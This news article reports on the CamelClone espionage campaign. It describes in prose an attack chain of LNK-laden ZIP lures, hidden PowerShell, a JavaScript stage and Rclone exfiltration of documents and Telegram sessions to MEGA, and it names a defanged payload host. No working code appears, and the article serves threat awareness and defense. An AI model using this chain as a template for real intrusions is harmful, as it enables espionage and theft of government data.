A recent cyber espionage operation, known as CamelClone, has been identified as a significant threat to government entities, defense sectors, and diplomatic missions in various countries, including Algeria, Mongolia, Ukraine, and Kuwait. This campaign employs spear-phishing tactics, leveraging ZIP files masquerading as official documents to initiate a series of malicious activities culminating in data theft via a legitimate cloud tool.
Operation Overview
The CamelClone operation came to light in late February 2026, when a suspicious ZIP file associated with Algeria’s Ministry of Housing was detected on VirusTotal. This file, uploaded from Algeria on February 24, marked the beginning of a series of targeted attacks. Subsequent files targeted Mongolia with themes around China cooperation, and further samples referenced Algerian-Ukrainian proposals and Kuwait’s Air Force, showcasing the operation’s broad geographical focus.
Strategic Targeting
Analysis by Seqrite highlights that despite the diverse targets, each country holds strategic importance in global geopolitics. Ukraine is entrenched in ongoing conflict, Algeria is pivotal in energy politics, Mongolia navigates complex relations with China and Russia, and Kuwait holds a key defense position in the Gulf. The attackers seem driven by intelligence gathering rather than financial gain.
Technical Execution
The attack methodology is consistent across all identified cases, utilizing ZIP archives containing LNK files with official-looking logos. When opened, a hidden PowerShell command activates, fetching subsequent attack stages from an anonymous file-sharing service. The absence of dedicated command servers, with all payloads hosted on filebulldogs[.]com and data routed through MEGA, complicates detection efforts.
Once initiated, the infection chain downloads and executes a JavaScript file, tracked as HOPPINGANT, which employs Base64-encoded PowerShell commands to further the attack. A decoy PDF distracts victims while a ZIP file with the Rclone tool is utilized to exfiltrate data, including sensitive documents and Telegram session information, to MEGA accounts linked to anonymous emails.
Defense Measures
Organizations in the government, defense, and diplomatic sectors should exercise caution with unsolicited ZIP files, particularly those referencing official matters. Blocking access to file-sharing services and monitoring data transfers to cloud platforms can reduce risk exposure. Additionally, limiting LNK file executions from untrusted sources and using behavior-based security tools can thwart these PowerShell and JavaScript exploits before they fully execute.
Stay informed by following us on Google News, LinkedIn, and X. Set CSN as a preferred source on Google for more updates.
